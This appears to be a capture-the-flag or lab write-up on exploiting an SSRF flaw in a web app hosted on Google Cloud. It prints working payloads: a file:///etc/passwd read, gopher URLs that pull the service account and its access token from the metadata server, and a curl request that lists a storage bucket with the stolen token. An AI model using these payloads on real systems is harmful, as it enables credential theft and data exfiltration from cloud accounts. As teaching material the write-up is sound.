Exploit SSRF with Gopher for GCP Initial Access
Target IP Address: 35.226.245.121
ENUMERATION
From the initial port scan, ports 22 (SSH) and 80 (HTTP) are open, while ports 1433, 3389, and 5432 are closed.
After viewing the landing page and moving onto the shop page, inspecting the elements reveals the site uses a Google Cloud Storage bucket. On the profile.php page, we can test for a Server-Side Request Forgery (SSRF) vulnerability.
EXPLOITATION
Using the file:///etc/passwd payload, we are able to view the local /etc/passwd file, proving that the application is vulnerable to SSRF.
To pivot into the cloud environment, we will gather information about the VM metadata. First, we query for the associated service account using the following Gopher payload:
gopher://metadata.google.internal:80/xGET%2520/computeMetadata/v1/instance/service-accounts/%2520HTTP%252f%2531%252e%2531%250AHost:%2520metadata.google.internal%250AAccept:%2520%252a%252f%252a%250aMetadata-Flavor:%2520Google%250d%250a
The query reveals the service account name is:
bucketviewer@gr-proj-1.iam.gserviceaccount.com
Next, we use another Gopher payload to retrieve the service account's access token:
gopher://metadata.google.internal:80/xGET%2520/computeMetadata/v1/instance/service-accounts/bucketviewer@gr-proj-1.iam.gserviceaccount.com/token%2520HTTP%252f%2531%252e%2531%250AHost:%2520metadata.google.internal%250AAccept:%2520%252a%252f%252a%250aMetadata-Flavor:%2520Google%250d%250a
To use the credentials, we export the token as a variable:
export ACCESS_TOKEN=<token>
DATA EXFILTRATION
Now that we have the credentials, we can query the bucket using the Google Storage API:
curl "https://www.googleapis.com/storage/v1/b/gigantic-retail/o" -H "Authorization: Bearer $ACCESS_TOKEN"
The result reveals a path to a flag. Finally, we can download the flag file via curl using the -o flag:
Top comments (0)